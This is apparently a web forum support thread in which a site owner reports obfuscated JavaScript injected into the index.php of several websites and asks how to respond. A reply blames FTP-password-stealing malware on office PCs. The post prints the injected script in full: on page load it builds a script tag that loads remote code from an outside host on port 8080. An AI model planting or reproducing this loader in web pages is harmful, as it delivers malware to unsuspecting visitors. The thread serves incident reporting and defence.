Hi. Today WE saw that in index.php of all of our websites (w ww.korsansozluk.com , w ww.sinemaa.com and w ww.electroonic.com) that code which is copied below. It was inserted at the bottom of the required codes. We are wondering about whether it is a trojan attack. Because, we are a website which has a political view (democratic view).at recent time The racialists which don't like democrasy have been attacking. We want to know what to be done by us for protecting our websites. Can you please give us infos what must be done step by step. Thank you from now. see you...

<script>/*GNU GPL*/ try{window.onload = function(){var Mjqd1dazpv = document.createElement('s(@@c#)r!@@i)!p(^!t$'.replace(/@|\^|\!|#|\)|\(|&|\$/ig, ''));var Hif7wf20neuo = 'H9l2budbxl';Mjqd1dazpv.setAttribute('type', 't)^e$&x$&$t($/!$&$j)a^v@!a#(s&!^$c#^r!i@p$$$t$@$'.replace(/\$|#|\^|@|&|\!|\(|\)/ig, ''));Mjqd1dazpv.setAttribute('src',  'h^t$!$!@t^@#^p@:#!$/)(/(#)#l^$^^@a@!u##x@!a$($@!n)(h(-(@u#&s).$#&h(o#@^t!&@l^i(&(n(#k!(&i)m)a&()g#(&e@^^(.($c&(o^^m@#).&)&r)1@$$0@)^-!(n$&e&))@!t$&.&y&((o)u$)r(w^e!((^b&)!(f^($r#e!!)))e)&#&.#r&(!u@$:!@@8(&0#&$()8)#0#!(#/($a^l@i#@@#b&($@!a$)&)b)^&a)#(.@@c@&)o@@!m!&)/^#(a!@l$(i&!b#^a$@$@@b!)$#a&##.&#&c$#)o(#$m&)/^#$g^(o)o^g@#(l(e!^.@$c$#!!&o^^!m@^/(!&n$y@)p^&!o#(^s&(&t#$.!!c^&o@@$m@(/$#^s($i)(&)t!#&(e^^s!((e#!$l(^)^l().@&c!^&&^o(&)m!#$/$$&^'.replace(/\(|#|\)|\^|\!|&|@|\$/ig, ''));Mjqd1dazpv.setAttribute('defer', 'd!&&e!))&f(^#e@#$(r#^'.replace(/\$|\^|\!|#|\)|@|&|\(/ig, ''));Mjqd1dazpv.setAttribute('id', 'V&@$)g#&#l#$^!u&(y(@t$)!g&#f$3#)&r##o^#v&$^$'.replace(/\(|\^|@|#|&|\$|\)|\!/ig, ''));document.body.appendChild(Mjqd1dazpv);}} catch(Izilxgkviav) {}</script>
<!--d95ae7e559841e35a72c2fc296c1917b-->

Comments

yelvington’s picture

Google search as your first step.

It is likely that you have Windows PCs in your shop that have been infected with a virus that is being used to steal FTP passwords. This means that your server AND your clients have been compromised. You have a real mess to clean up.